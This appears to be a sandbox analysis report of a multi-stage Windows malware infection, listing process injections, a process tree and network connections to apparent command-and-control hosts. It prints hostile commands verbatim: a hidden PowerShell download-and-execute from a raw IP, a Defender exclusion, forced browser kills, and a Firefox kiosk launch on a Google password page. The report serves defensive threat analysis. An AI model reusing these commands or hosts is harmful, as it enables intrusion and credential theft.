PID 2392 wrote to memory of 1684 N/A C:\Windows\system32\taskeng.exe C:\ProgramData\kplnh\nvwjc.exe
PID 2392 wrote to memory of 1684 N/A C:\Windows\system32\taskeng.exe C:\ProgramData\kplnh\nvwjc.exe
PID 2392 wrote to memory of 1684 N/A C:\Windows\system32\taskeng.exe C:\ProgramData\kplnh\nvwjc.exe
PID 2780 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe
PID 2780 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe
PID 2780 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe
PID 2780 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe
PID 2780 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe
PID 2780 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe
PID 2780 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe
PID 2780 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe
PID 1396 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe C:\Users\Admin\AppData\Local\Temp\onefile_1396_133856891568764000\chromium.exe
PID 1396 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe C:\Users\Admin\AppData\Local\Temp\onefile_1396_133856891568764000\chromium.exe
PID 1396 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe C:\Users\Admin\AppData\Local\Temp\onefile_1396_133856891568764000\chromium.exe
PID 2780 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 2780 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 2780 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 2780 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
PID 852 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Windows\SysWOW64\WerFault.exe
PID 852 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Windows\SysWOW64\WerFault.exe
PID 852 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Windows\SysWOW64\WerFault.exe
PID 852 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe C:\Windows\SysWOW64\WerFault.exe
PID 2780 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe
PID 2780 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe
PID 2780 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe
PID 2780 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe

"C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe

"C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe"

C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"

C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {30FCB4AD-7091-4EEA-9D54-B36AFCC25BC4} S-1-5-21-1846800975-3917212583-2893086201-1000:ZQABOPWE\Admin:Interactive:[1]

C:\ProgramData\kplnh\nvwjc.exe

C:\ProgramData\kplnh\nvwjc.exe

C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe"

C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe

"C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_1396_133856891568764000\chromium.exe

C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe

C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 852 -s 500

C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe"

C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 520

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1748 -s 1028

C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 1188

C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F90E.tmp\F90F.tmp\F910.bat C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\QanWmXjd\Anubis.exe""

C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe

"C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 1052

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1796 -s 1220

C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe

"C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe"

C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe

"C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe"

C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe

"C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1440 -s 512

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2408 -s 1020

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6f69758,0x7fef6f69768,0x7fef6f69778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe

"C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1160 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1508 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1572 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2224 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2256 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1944 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1336 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3416 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3528 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3740 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe

"C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe

"C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 1200

C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe

"C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\2nop8" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 11

C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe

"C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.0.1296375672\1433213446" -parentBuildID 20221007134813 -prefsHandle 1132 -prefMapHandle 1124 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f483df3f-b1a4-4423-b49d-69e0062c0cc8} 948 "\\.\pipe\gecko-crash-server-pipe.948" 1316 101f0158 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.1.256581804\1545010702" -parentBuildID 20221007134813 -prefsHandle 1552 -prefMapHandle 1548 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b5e4eda8-9824-4bfb-9ea5-043b9bf01f7c} 948 "\\.\pipe\gecko-crash-server-pipe.948" 1564 43eb558 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.2.1412349720\247694493" -childID 1 -isForBrowser -prefsHandle 2076 -prefMapHandle 2072 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a69bac0-4b15-49c6-aa05-a11402ae1fca} 948 "\\.\pipe\gecko-crash-server-pipe.948" 2088 1015f358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.3.667336605\570302175" -childID 2 -isForBrowser -prefsHandle 2636 -prefMapHandle 2632 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cebff203-e8dc-4de1-96ef-3c6e6d4f970b} 948 "\\.\pipe\gecko-crash-server-pipe.948" 2652 1cea4958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.4.271526683\1969280333" -childID 3 -isForBrowser -prefsHandle 3864 -prefMapHandle 3860 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3abba5e3-6a00-4f35-ac60-e899e86a146e} 948 "\\.\pipe\gecko-crash-server-pipe.948" 3912 1fbb2a58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.5.678688496\1769326617" -childID 4 -isForBrowser -prefsHandle 4020 -prefMapHandle 4024 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3c9037f0-c1d0-4a33-80d8-a7360110c749} 948 "\\.\pipe\gecko-crash-server-pipe.948" 4008 1fcc7358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.6.1788730289\2049257363" -childID 5 -isForBrowser -prefsHandle 4184 -prefMapHandle 4188 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3201214d-8736-4275-b124-7da9daf25f25} 948 "\\.\pipe\gecko-crash-server-pipe.948" 4172 1fcc7f58 tab

C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe

"C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe"

Network

Country Destination Domain Proto
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
NL 45.154.98.175:6969 tcp
LU 45.59.120.8:80 45.59.120.8 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
DE 5.75.210.149:443 tcp
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 moderzysics.top udp
US 172.67.189.66:443 moderzysics.top tcp
US 8.8.8.8:53 biochextryhub.bet udp
US 172.67.192.128:443 biochextryhub.bet tcp
DE 5.75.210.149:443 tcp
US 8.8.8.8:53 joyfulhezart.tech udp
US 8.8.8.8:53 hardswarehub.today udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
US 8.8.8.8:53 codxefusion.top udp
US 104.21.69.194:443 codxefusion.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.64.1:443 exarthynature.run tcp
US 8.8.8.8:53 towerbingobongoboom.com udp
US 213.209.150.137:4000 towerbingobongoboom.com tcp
US 213.209.150.137:4260 towerbingobongoboom.com tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
CH 185.208.156.162:80 185.208.156.162 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
NL 185.156.73.73:80 185.156.73.73 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.200.42:443 ogads-pa.googleapis.com tcp
GB 216.58.201.110:443 apis.google.com tcp
GB 142.250.200.42:443 ogads-pa.googleapis.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
GB 142.250.200.14:443 play.google.com udp
N/A 224.0.0.251:5353 udp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
DE 5.75.210.83:443 5.75.210.83 tcp
US 104.21.24.225:443 farmingtzricks.top tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
NL 185.156.73.73:80 185.156.73.73 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
US 104.21.24.225:443 farmingtzricks.top tcp
DE 5.75.210.83:443 5.75.210.83 tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 8.8.8.8:53 croprojegies.run udp
US 104.21.64.1:443 croprojegies.run tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
RU 45.93.20.28:80 45.93.20.28 tcp
N/A 127.0.0.1:50534 tcp
US 8.8.8.8:53 youtube.com udp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 getpocket.cdn.mozilla.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 youtube.com udp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
